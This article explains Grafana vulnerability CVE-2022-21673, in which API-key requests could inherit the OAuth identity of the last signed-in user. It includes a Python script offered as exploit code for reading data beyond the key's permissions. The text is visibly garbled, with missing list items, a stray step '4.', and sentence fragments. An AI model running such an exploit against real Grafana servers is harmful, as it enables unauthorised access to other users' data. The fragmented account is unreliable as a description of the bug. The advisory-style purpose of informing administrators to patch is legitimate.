Grafana is a leading open-source platform, popular for monitoring and observability, powering dashboards used by engineers and companies worldwide. In early 2022, a serious vulnerability (CVE-2022-21673) was discovered, potentially letting attackers access data they should not be able to see. This article explains how this bug worked, why it was dangerous, and what you need to do about it—using simple language and exclusive analysis.

What Is CVE-2022-21673?

The vulnerability revolves around Grafana's Forward OAuth Identity feature. This option, when enabled, forwards the OAuth identity of a logged-in user when certain data sources make their own queries. This is neat for Single Sign-On setups with strict permissions.

BUT—in affected versions, this system could be tricked by someone with only an API key. They could send a query without user credentials. Instead of being denied, the system would send the request with the identity of the most recent logged-in user. This means API key holders could access data intended for *someone else*.

API keys are being used by users to access Grafana

If any of these do not apply, your Grafana instance probably isn't vulnerable.

How the Exploit Works

Imagine you’re a developer given API access to some dashboards, but not to payroll dashboards. In a vulnerable system, if "Forward OAuth Identity" is switched on, your API requests could be tagged with the identity of the last signed-in admin—even if your API token isn't supposed to see what their account can.

The data source is configured with Forward OAuth Identity ON.

4. Grafana mistakenly uses the OAuth credentials from the last web user session and forwards those with the API request.

Example Code: Exploiting CVE-2022-21673

Suppose you have an API key with limited dashboard access.

import requests

# Replace with your Grafana endpoint and API key
GRAFANA_URL = "https://your-grafana.example.com/api/datasources/proxy/1/query";
API_KEY = "Bearer eyJrIjoib2..."

headers = {
    "Authorization": API_KEY,
    "Content-Type": "application/json"
}

# Query intended for a restricted datasource
data = {
    "queries": [
        {
            "refId": "A",
            "expr": "up",  # Prometheus query example
        }
    ]
}

response = requests.post(GRAFANA_URL, headers=headers, json=data)
print(response.status_code)
print(response.text)

If the *Forward OAuth Identity* misroute occurs, you'll see a response as if *an entirely more privileged user* made that request—potentially exposing sensitive data.

Enumerate dashboards and datasets far beyond their allowed range

This could violate internal policies, break regulatory compliance, or even expose secrets to competitors or the public.

Grafana developers patched this vulnerability in

- 7.5.13
- 8.3.4

References

- Original Grafana Security Advisory
- Issue on GitHub
- Community Discussion

Final Thoughts

*Simple configuration choices* can have big consequences. CVE-2022-21673 is a great reminder: features like Forward OAuth Identity should be enabled with care, and all access paths—API, OAuth, dashboards—should be well understood. Stay patched and stay secure.


*Stay safe, and always double check your dashboard configuration!*

Timeline

Published on: 01/18/2022 22:15:00 UTC
Last modified on: 05/14/2022 03:16:00 UTC